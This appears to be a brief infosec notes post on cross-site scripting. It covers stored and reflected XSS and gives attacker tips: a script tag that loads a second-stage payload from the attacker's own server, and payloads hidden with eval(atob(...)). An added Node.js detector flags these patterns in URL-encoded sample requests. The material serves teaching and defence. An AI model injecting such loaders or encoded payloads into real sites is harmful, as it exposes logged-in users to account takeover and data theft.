akde/infosec

Information security is ultimately about managing risk


Short: A user opens a link (e.g. from a phishing email) that carries an injection in the URL, which is then executed on the site as long as the user is logged in.

See also the command injections post.

Classes:

  • Stored XSS: An injection is stored on the server and served to (all) users.
  • Reflected XSS: An injection is given in the request, e.g. in a parameter.

Tip:

  • Use a second stage to load a more sophisticated JS instead of injecting the code right away. Inject this script:
    <script src="http://$ownServer/xss.js"></script>
  • Use the atob function to use base64-encoded strings as/in payloads.
    eval(atob("ba...."))
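
A defender-side view of the two tips above, as an added example that is not part of the original post: a Node.js check that scans request URLs for a reflected parameter carrying a second-stage `<script src>` loader or an `eval(atob(...))` wrapper. `SITE_ORIGIN`, the function names and the sample requests are constructed assumptions.

```javascript
// Added example: flag the two staging patterns in reflected request parameters.
const SITE_ORIGIN = "https://app.example"; // assumption: origin of the protected site

// Percent-decode repeatedly (bounded) so double-encoded values are inspected too.
function fullyDecode(value, maxRounds = 3) {
  let current = value;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try { next = decodeURIComponent(current); } catch { break; } // stray "%": stop
    if (next === current) break;
    current = next;
  }
  return current;
}

// Return the findings for one request URL (path + query, as seen in an access log).
function inspectUrl(rawUrl) {
  const findings = [];
  const url = new URL(rawUrl, SITE_ORIGIN);
  for (const [param, value] of url.searchParams) { // searchParams decodes once
    const text = fullyDecode(value);
    // Second-stage loader: a <script src=...> tag reflected in a parameter.
    const tag = /<script[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(text);
    if (tag) {
      let origin = null;
      try { origin = new URL(tag[1], SITE_ORIGIN).origin; } catch { /* malformed src */ }
      const rule = origin === SITE_ORIGIN ? "script-src-same-origin" : "script-src-external";
      findings.push({ param, rule });
    }
    // Encoded payload: eval() wrapped directly around atob().
    if (/\beval\s*\(\s*atob\s*\(/i.test(text)) findings.push({ param, rule: "eval-atob" });
  }
  return findings;
}

// Constructed sample requests (not taken from any real log).
const SAMPLE_REQUESTS = [
  "/search?q=shoes",
  "/search?q=%3Cscript%20src%3D%22http%3A%2F%2Fstage.example.net%2Fxss.js%22%3E%3C%2Fscript%3E",
  "/profile?name=%2565val(atob(%2522YQ%253D%253D%2522))", // double-encoded
];

for (const request of SAMPLE_REQUESTS) {
  console.log(request, JSON.stringify(inspectUrl(request)));
}
```

Matches like these are triage signals for access logs or a WAF rule; the fix for the underlying flaw remains context-aware output encoding, and a Content-Security-Policy that allows no external script sources and omits 'unsafe-eval' blocks both staging techniques in the browser.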
